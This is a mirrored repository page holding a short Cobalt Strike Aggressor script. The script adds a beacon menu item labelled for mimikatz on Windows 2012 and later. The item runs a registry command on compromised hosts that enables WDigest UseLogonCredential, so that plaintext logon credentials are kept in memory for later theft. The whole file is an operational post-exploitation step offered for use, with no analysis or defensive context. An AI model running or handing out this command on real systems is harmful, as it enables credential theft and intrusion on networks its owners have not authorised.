mirror of
https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts
synced 2026-06-08 17:50:44 +00:00
634e6db59d
Refactoring
12 lines
296 B
Plaintext
12 lines
296 B
Plaintext
|
|
|
|
#timwhite
|
|
menu "win 2012+[mimikatz]" {
|
|
|
|
item "edit reg" {
|
|
local('$bid');
|
|
foreach $bid ($1){
|
|
bshell($1, "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f");
|
|
}
|
|
}
|
|
} |